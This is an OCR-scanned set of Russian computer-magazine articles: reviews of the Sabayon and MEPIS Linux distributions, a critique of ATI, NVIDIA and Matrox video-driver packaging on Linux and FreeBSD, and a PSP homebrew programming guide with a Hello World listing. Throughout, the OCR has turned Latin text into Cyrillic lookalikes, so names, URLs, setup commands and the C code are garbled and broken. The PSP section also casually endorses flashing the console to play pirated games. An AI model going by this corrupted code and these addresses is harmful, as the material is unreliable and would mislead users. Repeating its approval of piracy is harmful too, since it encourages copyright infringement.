Всего здесь около 2000 пакетов. Кстати, игры БаиегЬгаІеп и 
Баѵаде можно запустить прямо из загрузочного меню. 

Для пользователей, которые сами предпочитают все настра- 
ивать, доступны облегченные варианты тіпі и Рпгіез5ІопаІ. 
Последний идет как самостоятельное решение со своей нуме- 
рацией и, скорее, ориентирован на применение в корпоратив- 
ной среде, чем на домашние системы. Варианттіпі пред- 
ставляетсобой урезанную до размера Сй версию большого 
дистра. В нем присутствуеттолько английский интерфейс (что 
легко исправить], но зато полностью оставлены мультимедиа 
возможности. 

В БаЬауоп при изменениях в релизе к номеру добавляется 
не цифра, а буква. Текущим стабильным является 3.4Т, хотя 
появиласьуже бета 3.5. 



Среди особенностей БаЬауоп 3.4 можно выделить поддержку 
в ядре файловой системы ехЫ. Этот ди стр и бути в также умеет 
работать в І_іѵеСО-варианте. Во время загрузки системы пред- 
варительные настройки производятся при помощи Апасопба, 
внешний вид которой стилизован под общую красно-черную 
тему «геб ѵѵіпе-ізЬ». Варианте ОѴО, кроме возможности запус- 
ка игр, содержитеще несколько фич. Например, пункт меню 
«Апопутоиз Іпіегпеі: Вгоѵѵзіпд» предназначен для анонимно- 
го серфинга после установки дистрибутива. Выбор ХзізІепСе 
позволяет сохранить настройки на флешку, а 51;аг1: ѵѵііЬоиІ: 
Мизіс отключает музыку (пока система загружается с ОѴО, нас 
развлекает приятная мелодия). 

Еще одна фича — йезкіор Ассеіегабоп. После определения 
типа видеокарты и выбора драйвера тебе будет предложено 
использовать АІ6І_Х, Х6І_ или вообще отказаться отЗО. 
Рабочий стол и меню в СЭ и ОѴО-версиях отличаются. Для йѴй 
темой значков является Ыиѵоіа, а для Сй — СгузІаІБѴб. Меню 
КйЕ в СОтрадиционное, а в ОѴй — КіскоТС. Поумолчанию 
активирована панель вверху экрана, на которую помещены 
часы, переключение рабочих столов и некоторые апплеты. 
Обновить систему очень просто, достаточно дважды щелк- 
нуть по Іірбаіе Іпз^аііег. В качестве программы установки 
приложений используется Роіаіо (роІаіо.зЕпеб . являющийся 
фронтэндом над РоНаде. По внешнему виду и принципу 
работы он несколько напоминает Бупарбс. С его помощью 
можно запустить ІІрба^е ѴѴогІб и просмотреть список пакетов, 
требующих обновления. Если отметить пакет, будет выведено 
описание, доступные параметры компиляции и версии. Прос- 
то отмечаем, что нужно, а все прочее (закачку, компиляцию, 
установку и удаление) возьмет на себя Роіаіо. 

Установка на жесткий диск производится при помощи той же 
Апакопба. Установленная на ЬЮй система грузится и работает 
заметно быстрее. 

г МЕРІБ 7.0 

Создатель МЕРІБ І_іпих ( ѵѵѵѵѵѵ.теріз.ога ). Уоррен Вудфорд, 
признается, что перепробовал все популярные дистрибутивы, 
но так и не смог дождаться, когда хоть один из них дорастет до 
настольного использования. Другой, возможно, и отчаялся бы, 
ноУоррен не изтаких людей. Он принял решение о создании 
своего дистрибутива. Первая версия, появившись в мае 2003, 
уже через три месяца висела вТОР-Ю ОізІхоѴѴаІсЬ.сот. Ас 
января 2005 МЕРІБ — на 1 месте (где и продержался некото- 
рое время). Кстати, Уоррен — не простой парень сулицы, а 
личность довольно известная, так какбыл одним из разработ- 
чиков среды ЫеХТ. Что такое юзабилити, он знает не понас- 
лышке. Рабочее окружение пользователя сконфигурировано 
с расчетом на простоту и удобство, ничего лишнего, все под 
рукой. Несмотря на то, что на эмблеме изображены египетские 
пирамиды, и девизом проекта долгое время был слоган «Тих 
Ііке ап Едурбап», родина дистрибутива — США, где и живет 
Уоррен. Базируется МЕРІБ на ОеЬіап (версия 6.0 на ІІЬипІи) и с 
самого начала был ориентирован на настольное применение, 
хотя указано, что его можно использовать в качестве сервера. 
Как и все дистрибутивы обзора, МЕРІБ — это ЫѵеСО с воз- 
можностью установки на хард. Автоматическая настройка 
оборудования признана даже лучшей, чем в КЫОРРІХ. Кстати, 
МЕРІБ научился изменять размер разделов МТРБ еще вте 
времена, когда в других дистрах об этом только мечтали. 

До 2004 года была доступна только одна версия — собственно, 
МЕРІБ. Затем произошло разветвление на две ветки: МЕРІБ 
и БітрІуМЕРІБ. Дистрибутив распространяется по лицен- 
зии 6РІ_, но на сайте нам предлагают купить Сй или право 
загрузки. Здесьже даются ссылки на зеркала, с которых МЕРІБ 
можно загрузить совершенно бесплатно. Правда, перебрав с 
десятокзеркал, удалось найти лишь МЕРІБ апбХ 7.01 , который 
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Большое количество 
статей по РСЫпихОЗ 
можно найти в жур- 
нале пользователей 
РСЫпихОБ Мадаііпе 
( рсІовтад.сот/ЫтІ/ 
епіег.Ыт ]. 

• По адресу рсііпих.ги 
ты найдешь пользо- 
вателей РСЫпихОЗ, 
плюс на форуме про- 
екта можно отметить 
неплохую поддержку. 
Есть ветка и на рус- 
ском. 




ориентирован на старое оборудование (будет работать на РІІ 
266 с 64 Мб ОЗУ]. Его также с успехом можно использовать как 
гевсие дистр. Версия ЗітрІуМЕРІЗ открыта для свободной 
загрузки. Доступны как32-,таки 64-битные варианты. 

Забота о юзере в МЕРІ5 прослеживается уже с окна загрузки — на 
выбор предлагаются три варианта, в зависимости от используе- 
мого монитора. В панели КБЕ находится значок, открывающий 
доступ ко всем настройкам (юзеру не приходится искать, что и где). 
Причем, среди пунктов есть и разработки проекта, отвечающие 
за определенные настройки: МеЬмжк.ЗузІет.ОзегиХ-ѴѴіпсІоѵѵв 
(именноХ-ѴѴіпсІоѵѵз). Наличия этих Аззівіапіъ уже достаточно, чтобы 
рекомендовать М ЕРІ5, особенно в случае, если дружба с ОеЬіап 
по какой-то причине не сложилась, а работать в нем хочется. С 
Х-ѴѴіпсіоѵѵвАзвізідпі можно одним щелчком установитьлюбой драй- 
вер для видеокарты и настроить параметры Х-сервера. В Зузіет 
предлагается отформатировать и создать загрузочную флеш кус 
МЕРІ5 или файл ОпТЬебо. Последний можетбытьзашифрованным. 
В нем сохраняются настройки, и, значит, можно спокойно работать 
в связке ЫѵеСО+ІІЗВ, как в обычной системе. На других вкладках 
находятся пункты для восстановления загрузчика и разделов харда. 
В Озегтоже есть интересная вкладка, с ее помощью можно синхро- 
низировать или копировать пользовательские настройки. 
Количество приложений в Сй-варианте впечатляет. Разработчики 



включили в поставку все самые популярные программы. Недоста- 
ющее можно установить при помощи Зупарбс, который использует 
собственный репозиторий МЕРІБ, зІаЫе ОеЬіап и другие, совмес- 
тимые. Учитывая, что репозиторий ОеЬіап содержит самое боль- 
шое количество пакетов, недостатка в программах в МЕРІ5 нет. За 
обновлениями следитапплет, помещенный в панель. Программа 
установки на жесткий диск тіпзіаіі проста и понятна. 

Один недостатокв МЕРІ5 все же есть — локализация. Изна- 
чально поддерживается небольшое количество языков и рус- 
ский в этом списке отсутствует. Учитывая дебиановские корни, 
проблему можно решить — но не каждому новичку эта задача 
по плечу, да и специфические утилиты переведены не будут. 

г ПОВОДЫ ДЛЯ ЗНАКОМСТВА 

Итак, четыре дистрибутива, обогнавшие по популярности 
решения, на основе которых они построены: Мапсігіѵа, Ббипіи, 
ОеЬіап и бепіоо. Что объединяет рассмотренные проекты? 
Улучшенная поддержка оборудования, направленность на 
пользователя с меньшим уровнем подготовки и совмести- 
мость с репозиториями основных дистров. Вполне возможно, 
один из них — как раз тот ди стр, который ты ищешь. ЗЕ 



• Ты можешь внести 
свою лепту в развитие 
І_іпих Міпі, просто 
рассказав о проблеме 
на форуме проекта 
— Ііпихтіпі.сот/ 
Тэгит . 



• Пользователи 
МЕРІ5 организо- 
вывают сайты и 
форумы поддержки, на 
которых можно найти 
единомышленников и 
поделиться проблема- 
ми. Самый извест- 
ный из них — ѵѵ уууу. 
терізіоѵегз.сот . 
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хВЗО. Вот только качество этих драйверов далеко не на высоте и без танцев с ! 



)уОном при установке и использовании не оОоитись...| 






Б МОНСТРЫ В ЗООПАРКЕ 

Никсовая модель разработки драйверов радикально отличается от 
принципов системного программирования под ѴѴіпсІоѵѵз. Зоопарк ЬІ N IX- 
подобных систем требует совершенно иных подходов, вовлекающих в 
процесс разработки драйвера создателей самой операционной системы. 
Без их поддержки драйвер обречен на поражение. 

При всем многообразии ѴѴіпбоѵѵз-систем (драйверная модель которых 
многократно меняласьдаже в рамках линейки ЫТ) количество иххоть и 
велико, но конечно. Всякая система дана нам в виде законченного набора 
двоичных модулей, обладающих вполне предсказуемыми свойствами. 

В никсах же все зыбко, здесь ни на что нельзя положиться. Продвинутый 
пользователь можетскомпилировать монолитное ядро без поддержки 
модульности (а это значит, что драйвера должны быть представлены в виде 
исходныхтекстов, включенных в общее дерево ядра). Системные вызовы 
варьируются отсистемы к системе, поддерживают множество моделей пе- 
рехода с прикладного уровня на уровень ядра (далекий вызов по селектору 
07Ъ, прерывание 80Ь, машинная команда ЗУЗЕЫТЕК) и допускают изме- 
нение соглашения о передаче параметров — через стек или регистры... 
ІІЫІХ-сообщество не прилагает существенныхусилий для облегчения 
жизни сторонним создателям драйверов. И препятствует распростране- 
нию закрытых бинарных драйверов, работающихтолько под той версией 
ІІЫІХ’а, для которой они были созданы. ЭМІХѵѵау — это открытые тексты, 
адаптируемые создателями дистрибутивов с учетом всех внесенных 
ими изменений в код ядра, высокоуровневых библиотек-оберток вокруг 
системных вызовов и т.д. Таким образом, при всем нежелании коммер- 



ческих разработчиков расставаться с исходными текстами — другого пути 
попросту нет. Всякие попытки обойти фундаментальные особенности 
ІНЧІХ-систем рождают монстров, от которых не в восторге ни составители 
дистрибутивов, ни конечные пользователи. 

Но довольно слов! Задело! Рассмотрим, какие подходы исповедуют веду- 
щие разработчики: АТІ, ІЧѴЮІА, Маігох — и чем они порочны. 

ИАТІ 

Не драйвера, а гигантские циклопические сооружения, занимающие вупако- 
ванном виде порядка 50 Мб! Это создает определенные проблемы даже для 
пользователей А05І_, не говоря уже о диалапщиках. И что же находится внутри 
чуда инженерной мысли с расширением .гип? Оказывается, файл представ- 
ляет собой короткий з Ье II- с крипт. К нему дописан діір-архив, проверяемый 
на предмет целостности этим самым скриптом, с последующей распаковкой и 
передачей управления на пусковой файл (если проверка прошла успешно). 
При желании гип-файл можно распаковать и руками. Грузим его в любой 
Ьех-редактор и находим последовательность «1Е 8В 08 00», выделяя 
блок отсюда и до ЕОР. Сохраняем его на диск, меняя расширение на . дг, 
натравливаем дгір (или любой другой совместимый с ним архиватор). 
Затем извлекаем оттуда . Ьаг, который и разворачиваем на диске со всей 
иерархией директорий, что там имеется. 

В корневом каталоге архива находится огромное количество .зЬ-фай- 
лов, из которых нас в первую очередь интересу ют <эРі -іпзіаііег . зЬ, 
розЬип_б.гѵ . зЪ.,розЬ_б.гѵ . зЬ и рге_сігѵ . зЪ., отвечающие за опреде- 
ление версии системы, сборку и установку драйверов. 
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Сами драйвера поставляются в виде «полуфабриката» 

— откомпилированных во-библиотек, расположенных в 
каталогах /х710, /х690, /х680 (для 32-разрядных версий) 
и /х710_64а, /хб90_64а, /х680_64а (для 64-разряд- 
ных версий). Как легко заметить, за этими «магическими» 
цифрами скрывается модель видеокарты (и, в зависимости 
оттипа драйвера, эти цифры могут варьироваться в очень 
широких пределах). Однако помещать в один архив драйвера 
для разных видеокарт не есть хорошо, тем более что каждый 
из каталогов (а их у нас шесть!) в неупакованном виде тянет на 
десяток мегабайт. 

Дальше начинается самое интересное. «Полуфабрикаты» соби- 
раются на конечной машине, линкуясь при помощи стандартно- 
го линкера Ы (в дистрибутивах, заточенных под начинающего 
пользователя, его обычно нет). При этом возникаетпроблема 
определения версий стандартных библиотек (типа ІіЬс } и путей 
кним. Она решается эвристическим путем, реализованным в 
процедуре ОеІесіЫВС (см. файл аЪі-іпзЪа11ег . зЬ, который, 
кслову, содержит довольно много ошибок). 

Парни из АТІ (судя по всему) не знают, что линковать модули 
можно не только с помощью линкера, но и компилятора дсс, 
который уж точно знает, какие библиотеки у нас установлены 
и где их искать. Впрочем, на целевой машине дсс можети не 
быть, так что подход разработчиков в чем-то оправдан. Если 
ты нарвался на ошибкулинкера, ругающегося на ненайден- 
ные библиотеки/пути, можно заглянуть в вышеупомянутые 
скрипты и пофиксить проблему вручную. 

Системно-зависимый код вынесен в директорию /раскадез, 
из которой следует, что в настоящий момент АТІ поддерживает 
следующие дистрибутивы: /БеЫап, /Еесіога, /Мапсігіѵа, 
/КесіЕІад, /КебНаЬ, /Зіаскѵгаге, /ЗиЗЕ и /ЦЬипііи. Они 
отличаются друг от друга, главным образом, абсолютными 
путями и «родимыми пятнами» (например, в ІІЬипІи это 
способ запуска программ из-под гооСа]. Все системно-за- 
висимые файлы представлены в текстовой форме (скрипты) 
и при возникновениитерокс конкретным дистрибутивом 
сравнительно легко правятся более или менее продвинутым 
пользователем. Кстати, обращает на себя внимание интерна- 
циональный состав разработчиков драйвера. Комментарии 
кскриптудля /Зіаскѵіаге написаны на французском языке, 
остальные — на английском. 

«Полуфабрикаты», собираемые на целевой машине (при всех 
минусахтакой схемы), — это большой шаг вперед для инжене- 
ров из АТІ. Раньше было еще хуже. Возле ссылки на драйвер 
красуется горделивое примечание: «Ыоѣез: ТЬе аЬоѵе 
сігіѵегз зиррогі ЕпдІізЪ. опіу. Т1 зе с іізріау сігіѵег 
гедиігез РОЗІХ зкагеб. шелюгу Іо Ъе епаЫей оп 
Ыіе зузкеш. Кегпеі Зоигсе раскаде із по Іопдег 



гедиігесі іі Кегпеі Неасіег раскаде із іпзіаііеб.». 
Отс ю да сл е ду ет, что теперь уста н о в щи ку тре бу ются лишьзаго- 
ловочные файлы, а не полныетексты ядра, которые зачастую 
отсутствуют даже на девелоперских машинах! 
Библиотеки-полуфабрикаты изначально закладываются на 
вполне конкретные архитектурные особенности, что ухудшает 
их совместимость с нестандартными ядрами. Не говоря уже о 
том, что от ядра требуется поддержка модульности (упроща- 
ющая внедрение гооІкіСов) и, вообще, гарантий, что драйвер 
встанет «влет», у нас нет никаких. И стоило ради этого качать 
50 метров? 

^ ЫѴШІА 

Сабжевая фирма также использует гип-формат (для І_іпих 
систем) и простой діір-архив (для РгееВБО), каждый из 
которых занимает ~13 Мб, что намного лучше, чемуАТІ. В 
комплект поставки входит подробная документация в фор- 
мате тап и Ыті, в неупакованном виде занимающая -1 Мб с 
описанием возможных проблем и путей их решения. На этом 
благопристойности и заканчиваются. Дальше начинается 
сплошной мрак. 

Каталог /изг/згс вместо исходных текстов содержит 
заголовочные файлы, двоичный загружаемый модуль ядра 
г\\і-кегпе1 . о и предкомпилированные бинарники (из 
подкаталога ргесошрііесі}, специфичные для каждой кон- 
кретной версии Ыпих’а. В частности, дистрибутив ВебНаСа 
насчитывает78 версий. Другие дистрибутивы — чуть меньше, 
но проблема не в количестве, а в самом факте наличия сис- 
темно-зависимых файлов. Они представляют собой обычные 
объектные модули в ЕБР-формате, слегка искореженные раз- 
работчиками, впендюрившими свой логотип перед ЕБР-заго- 
ловком. Чтобы «скормить» файл дизассемблеру, необходимо 
открыть его в Ьех-редакторе, найти строку «ЕЬР», выделить 
блок до ЕОР и сохранить его в нормальный объектный модуль, 
который теперь можно хачить, исправляя ошибки разработ- 
чиков. После чего проделать обратную операцию, вернув 
заголовок на место. 

В драйвере для РгееВЗБ директории ргесошрііесі, естест- 
венно, нет, поскольку, РгееВБй — она одна (зоопарка клонов 
здесь нет). Точнее, это парни из ЫѴЮІАдумают, что она одна, 
забывая о различных версиях и нестандартных ответвлениях, 
не говоря уже о ІЧеіВБО и ОрепВБО, где все совсем по-друго- 
му. Самое смешное, что даже во РгееВБО-версии драйвера 
присутствует множество «не вычищенного» І_іпих-кода. 
Несмотря на то, что качество ЫѴЮІА-драйверов намного 
выше, чем у АТІ (ГѵІѴЮІА учитывает многие неочевидные 
тонкости ядра), с совместимостью дела обстоят кошмар- 
но. Драйвер либо ставится автоматом, либо не ставится 




> ІП^О 

• Свободный драйвер 

для видеопроцессо- 
ров Іпіеі (хШб-ѵібео- 
іпіеі) не был рассмот- 
рен, поскольку автор 
не имеет ни одного 
компа с интегриро- 
ванным видео от Іпіеі. 

• Линкер (компонов- 
щик) связывает и 
объединяет ассембли- 
рованные объектные 
файлы в исполняемую 
программу. 

• Официальные 
драйвера от ЫѴЮІА 
используютсвой спо- 
соб доступа к видео- 
карте и не нуждаются 

в йРІ (Оігесі: Репбегіпд 
Іпітазігисішге обес- 
печивает прямой 
доступ к видеокарте 
и функциям 0реп6І_). 
Драйвера от АТІ и 
Маігох полностью 
поддерживают архи- 
тектуру йРІ. 
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вообще, и чтобы заставить его работать, необходимо сменить версию 
І_іпих (РгееВЭЭ). Или, при наличии опыта, попытаться захачить двоичные 
файлы, разобраться в которых намного труднее, чем в текстовых скриптах 
от АТІ. 

Вывод: при всей моей антипатии к АТІ (о вкусах не спорят, это дело личное 
и, можно даже сказать, интимное] лучше все-таки скачать 50 метров вся- 
кого мусора, чем ковыряться в двоичных файлах от ІЧѴЮА, рискуя потерять 
совместимость при обновлении версии ядра. С другой стороны, если 
драйвер от ІЧѴЮІА работает, то он работает, а не глючит — что частенько 
случается с продукцией от АТІ. Короче, как и везде, имеется проблема 
выбора наименее худшего из двух зол. 

^ МАТКОХ 

Компания Маігох (которой мыщъх оставался верным на протяжении пос- 
ледних десяти лет) максимально приближена кфилософии ІІЫІХ’а, однако, 
не выдержав конкуренции в бытовом секторе, она сосредоточилась на 
промышленном (в частности, поставляет видеокарты для медицинского 
оборудования). Это положительно сказалось на качестве кода. 

Размер діір-архива с драйверами составляет всего-то 3 Мб. Рядом лежит 
архив с полным набором «честных» исходных текстов — чуть больше 2 Мб. 
Красота! Наличие сорцов позволяет пофиксить любые ошибки (одна из ко- 
торых заключается в попытке повторного освобождения уже освобожден- 
ной памяти — обнаружена мной в ходе разборов спонтанно возникающих 
глюков). Исходные тексты (не без переделок, конечно) могутбыть встроены 
непосредственно в ядро, откомпилированное без поддержки модульнос- 
ти. Поддержкой новых (или древних) версий может заниматься любой 
энтузиаст, а не только компания-производитель, и для этого совершенно 
необязательно копаться в двоичном коде. 

В конце концов, Маіхох производит и продает видеокарты, а не програм- 
мное обеспечение. Какой смысл зажимать исходные тексты, если там все 
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Решение проблем 
установки 

ОК, драйвер скачан, но его установка проваливается (или новые 
графические режимы и возможности акселерации остаются неза- 
действованными) . Что делать? ! Самое простое — забросить Ьіпих, 
вернувшись на ѴѴіпсІоѵѵз (где таких проблем просто нет) . Ведь, если 
человеку нужен графический десктоп (со всякими там ускорениями 
и эффектами прозрачности), то, значит, в философию ІІпіх он не 
вкурил, и ему нужна еще одна ѴѴіпсІошз, только не такая как у соседа, а 
более крутая. Скажите, что мешает работать в ѴЕ5А-режиме и псевдо- 
текстов ом консольном режиме, поддерживаемом всеми видеокарта- 
ми без исключения? 

Если же все-таки хочется графических наворотов, — что ж! Первым 
делом следует внимательно прочитать руководство по установке 
драйвера (установив пакет программ для разработчика и заголовоч- 
ные файлы ядра, если они не были установлены ранее) . Затем изучить 
оп-Ипе справку и РА(2 по установке. В 9 из 10 случаев там содержится 
либо решение проблемы, либо некий ѵѵогк агоипсі («обходной путь») . 
Наконец, можно обратиться в отдел поддержки, подробно описав 
ситуацию (только не стоит ждать быстрого ответа), или немного 
погуглить в Сети. 

Гарантий, что проблема имеет решение, естественно, никаких. 
Особенно, если пытаться подружить передовую модель видеокарты 
с древней версией Ілпих (равно как и наоборот) . Скорее всего, нам 
предложат сменить систему или карту — *піх-системы всегда слави- 
лись своей «дружелюбностью» к потребителям. 
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Ассортимент І_іпих/хВ50 видеодрайверов от ЫѴЮІА 



равно нет ничего интересного? К тому же, выдрать ноу-хау 
(если предположить, что такое там имеется) — не такая уж 
сложная и дорогостоящая задача. 

Впрочем, мы отвлеклись. Вернемся кнашим матрасам, тем 
более что все их достоинства на этом заканчиваются. Предо- 
ставляя исходные тексты, компания не заботится о поддер- 
жке зоопарка І_іпих-систем и перекладывает решение этой 
задачи на плечи конечного пользователя. В геабте-файле 
так прямо и написано: мы используем абсолютные пути из Веб 
Наі І_іпих 9.0, а если у вас они отличаются (как, например, в 
ІІЬипіи), то... берите исходные тексты и правьте их самостоя- 
тельно или создавайте символьные ссылки в своей файловой 
системе. Короче, делайте, что хотите, только нетрогайте нас! 
Но пути — это ладно, исправить их — минутное дело. Куда хуже 
то, что Маігох поддерживаетограниченное количество версий 
Х’ов. В частности, драйвер для видеокарт 0200/6400/6450/ 
6550 работаеттолько сХ.огд версий 6.7.0, 6.8.0, 6.8.1 , 6.8.2, 

6.9.0 и 7.0.0, а все прочиеуже требуют довольно радикальной 
правки исходных текстов (и, соответственно, опыта разработки 
драйверов для І_іпих/В50). Учитывая невысокую популярность 
продукции Мангах на массовом рынке, этим никто за просто 
такзаниматься не будет. Разве только при установке Маіхох 
на промышленное оборудование, вокруг которого крутятся ог- 
ромные деньги и тусуется множество грамотных специалистов. 
Впрочем, пионеровтоже хватает (как и влюбой индустрии). 

^ КОГО ХОЧЕШЬ — ВЫБИРАЙ... 

На каком же вендоре стоит остан овить свой выбор? Вопрос 
неоднозначен и зависит от специфики решаемой задачи. В 
критических инфрастуктурах (или домашнем компьютере, 
владелец которого каждую перезагрузку ощущает чуть ли 
не какфизическую боль) лучше всего использовать видео- 
карты от Маіхох (если только их удастся найти), но прежде 
чем драйвера встанут в строй, над исходными текстами 
придется пыхтеть не одну ночь. Зато мы получим именно то, 
что нам нужно (например, монолитное ядро, рекомендуемое 
к использованию в серверах). Без опыта программирования 



драйверов под Ыпих/РгееВЗО за Маіхох лучше не браться 
(за исключением тех случаев, когда заданная конфигурация 
явным образом поддерживается драйвером). 

АТІ — это «микрорайон», состоящий из большого количес- 
тва сборных домиков, построенных в стиле: «не нравит- 
ся — пересобери сам». Количество поддерживаемых 
дистрибутивов довольно велико. Поэтому править скрипты 
вручную приходится лишь относительно небольшому числу 
«счастливцев», обладающих «не той» версией Бі п их/ 
РгееВЗй. Впрочем, установка драйвера по-любому требует 
инструментов разработки и заголовочных файлов ядра, 
отсутствующих во многих дистрибутивах. Это существенно 
увеличивает объем скачиваемых файлов, а трафик, он, 
как известно, денег стоит (даже на безлимите, потому как 
время — те же деньги). 

ЫѴЮІА вызывает довольно противоречивые чувства. 
Качество драйверов намного выше, чем у АТІ (но ниже, чем 
у Маіхох). Количество поддерживаемых версий Ыпихтоже 
будет повыше, чем у АТІ. Увы, если текстовые скрипты АТІ 
позволяют справиться с проблемой, что называется, «на 
лету», без отрыва от распития пива из кружки с надписью 
«гооі», то захачить двоичные файлы, «заботливо» предо- 
ставленные ЫѴЮІА, сможеттолько продвинутый хакер — да 
и то, не без матюгов. 

Короче, нет в мире совершенства. Ожесточенная конкурен- 
ция положительно сказывается на ассортименте и качестве 
*піх-драйверов — но кто первым выпустит«правильный» 
драйвер, можно только гадать. До полностью автоматичес- 
кой установки драйвера еще далеко, и поддержка Ыпих 
(не говоря уже о ВЗР-подобных системах) по-прежнему 
представляетсобой огромную головную боль, частично 
снимаемую армадами хакеров и продвинутых пользовате- 
лей. Если отбросить Маіхох, то АТІ больше ориентирована 
на опытных пользователей, а ЫѴЮІА — на «домохозяек» или 
мега-хакеров, способных разобраться в двоичном коде. У 
каждого бренда свои проблемы, и идеального производите- 
ля не существует. ;зс 




ѵѵѵѵѵѵ.х.огд 

\лл/ѵѵѵ.х1хее86.огд 

ѵѵѵѵѵѵ.пѵісііа.сот 

ѵѵѵѵѵѵ.аб.сот 

ѵѵѵѵѵѵ.ппаігох.сот 




> СІѴСІ 

На прилагаемом к 
журналу диске ты 
найдешь последние 
версии драйверов 
отАб, Іпіеі, Маіхох, 
ЫѴЮІА. 
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ПРОГРАММЕРСКИЕ ПОВОРОТЫ В ЖИЗНИ ТВОЕЙ РІ.АѴ5ТАТІ0Ы: РОКТАВІ.Е 



Ргіпсе о^Регзіа, СосЬ о^ѴѴаг... эх, что может быть интереснее, чем ежеднев- 



ное рубилово на мощной карманной приставке? Для геймера — ничего. А 



вот хакер, скорее, заинтересуется, как воспользоваться незаурядными воз- 



можностями ультрапортативной РЗР в своих черных (и не очень) целях. 



Н ОТ ИГР К ПРОГРАММИРОВАНИЮ 

Когда у меня появилась Р5Р, я был изрядно разочарован. Действительно, 
зачем мне игровая платформа, игры к которой стоят под тысячу рублей каж- 
дая, а никакого иного толку от нее нет? И это притом, что игры рассчитаны 
на несколько часов или дней, а шедевров вроде Ріпаі Рапіазу VII: Сгізіз Соге 
или Раіароп’а мало, да и достать их (легально) в нашей стране трудновато. 
Ріо, к счастью, я оказался не прав: пираты давно разобрались с этой жуткой 
проблемой, и теперь каждый может попробовать игру перед покупкой, 
проведя лишь однажды нехитрый процесс перепрошивки. Послетого, 
как на флешке приставки побывали десятки гигабайтигр, разочарование 
постигло меня вновь — играть надоело, хотелось большего. ѴѴі-Рі, неплохой 
процессор, большой экран и полноценная ОС на очень портативном уст- 
ройстве, весьма экономично использующем батарейку, — неужели это все 
лишьдля игр? Возможно, так думали наивные разработчики приставки, но 
уж никак не хакеры, научившиебСС компилировать программы под соньку. 
И научили они, надо сказать, неплохо. Мы получаем полноценный С/С++ 
без грязных хаков и недоделок, с более-менее документированным АРІ и 
— ух ты! — возможностью использовать некоторые известные библиотеки, 
вроде 50І_. Это, конечно, не ЮЕ отБопу, продающаяся за какие-то нереаль- 
ные деньги. Большой подробной справки по каждой функции тут нет, но 



использовать можно. Тем более, жизнь облегчаетто, что Р5Р — она такая 
одна, и не надо делать всякий раз поправки на производителя и модель, как 
это бывает при программировании на)2те. С другой стороны, поскольку 
никаких виртуальных машин нет, есть шанс накосячить, сломав к чертовой 
матери всю приставку или отдельные ее части. Рискуменьшаетто, что тут, 
как и во многих других «взрослых» ОС, обычные программы запускаются в 
пользовательском режиме, не столь опасном, как режим ядра. 

В ПРИСТУПАЕМ 

Учти, программирование для Р5Р — неизученные и опасные дебри. Одно 
дело программировать для компьютера, где все давно изучено и знакомо, 
или для телефонов, где виртуальная машина не даеттебе сойти с дороги, а 
другое — для странного МІР5-процессора, до которого прежде добирались 
лишь самые опасные маньяки с паяльником. Высадку в эти джунгли стоит 
начатье перепрошивки — она достаточно подробно описана, например, на 
Иир://р5р^ац5.ги/. 

Теперь, когда приставка готова к высадке ЬотеЬгеѵѵ (так кличут программы, 
написанные пользователями для приставок), нужно заготовить войска. 
Плацдармом для компиляции будет служить Судѵѵіп с пакетами Оеѵеі и ѴѴеЬ/ 
ѵѵдеі: — он у тебя уже установлен, так? Понадобится РБРТооІсЬаіп — набор 
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необходимых для компиляции программ. Скачав с ЬНр://р52с1еѵ.огд/р5р/ГооІ5/ 
ТооІсЬаіп или забрав с диска, его надо будет разархивировать в %судміп_ 
іпзка11_Ео1д.ег% /коте / %міпд.омз_изегпате% (если такой папки нет 
и тебе страшно ее создавать — запусти сигвин и она появится). Открой шелл 
сигвина и перейди в директорию стулчайном (с<3 рзрЬооІскаіп), после 
чего запусти . /Ъоо1сЪ.аіп-зид.о . зк. Он скачает и установит еще несколько 
нужных программ. Это займет немалое время. После установки открой файл 
%судѵ7Іп_іпзЬа11_коЫег%/судѵііп .Ъаі и замени его содержимое на: 

@ес1іо обб 

С: 

сМіг С : \судѵ7Іп\Ьіп 

веб раЫі=%раб]і% ; С : / судміп/изг/ІосаІ/рзрсІеѵ/Ъіп 
зеб РЗРЗБК=С : /судѵ/іп/изг/іосаі/рзрсіеѵ 
ЬазЬ --Іодіп -і 

Так мы устанавливаем переменные среды перед запуском Судѵѵіп-а — что- 
бы легчебыло компилировать (не забудь поменять пути вфайле, еслиты 
ставил сигвин не в С: \судѵ/іп\). Все! С настройкой, похоже, покончено и 
можно писать программу. 

Перезапусти сигвин, чтобы он узнал о переменных, и создай папку 
ргозесіз ( тксііг ргозесіз). Перейди в нее (сс? ргозесѣз), создай 
папку кеііоѵюгіб. (ха-ха, а ты чего хотел? с этого все всегда начина- 
ется) и перенесисьтуда. Теперь нужно открыть какой-нибудь текстовый 
редактор (или даже ЮЕ), создать в нем файл и сохранить его в нашу папку 
кеііомогід. под именем таіп. срр. Лично я советую Ыо1:ераб++, ноты 
можешь использовать что угодно — хоть Ѵізиаі Зіисііо, хоть блокнот. Файл 
должен содержать воттакой код: 

Самый первый код 

#іпс1ис!е <рзркегпе1 .Ъ> 

#іпс1исІе <рзрсіеЬид.]і> 

РЗР_МОШЬЕ_ШРО ( "Неііо ШгЫ" , 0 , 1 , 1 ) ; 
іпб ЕхібСаІІЪаск ( Агді , Агд2 , ѵоісі *Сошшоп) { 
зсеКегпеІЕхібСате ( ) ; 

гебигп 0 ; 

} 

іпб СаІІЪаскТЬгеасЦЗсеЗіге Агдз, ѵоісі *Агдр) { 
іпб СаІІЪаскІсІ; 

СаІІЪаскІсІ = зсеКегпеІСгеабеСаІІЪаск 
("ЕхібСаІІЪаск", ЕхібСаІІЪаск, ЖГЬЬ) ; 
зсеКегпеІКедізбегЕхібСаІІЪаск (СаІІЪаскІсІ) ; 
зсеКегпеІЗІеерТЪгеасіСВ ( ) ; 

гебигп 0 ; 

} 

іпб ЗебирСаІІЪаскз (ѵоісі) { 
іпб ТЪгеасІІсІ = 0; 



ТЪгеасІІсІ = зсеКегпеІСгеабеТЪгеас! ( "ирс!абе_бЪгеасІ" , 

Саі ІЪаскТЪг еаЪ , 0x11, ОхРАО , 0, 0); 
іб (ТЪгеасІІсІ >= 0) 

зсеЖегпеІЗбагбТЪгеа<5(ТІігеа<ІІсі, 0, 0) ; 
гебигп ТЪгеасІІсІ; 

} 

іпб таіп (іпб агдс , сЪаг ** агдѵ) { 
рзрБеЪидЗсгеепІпіб ( ) ; 

ЗебирСаІІЪаскз ( ) ; 
иМІе (1) { 

рзрБеЬидЗсгеепРгіпбб ( "Неііо ] [АКЕР! \п" ) ; 
зсеБізрІауМаібѴЫапкЗбагб ( ) ; 

} 

зсеКегпеІЗІеерТЪгеаЪ ( ) ; 

гебигп 0; 

} 

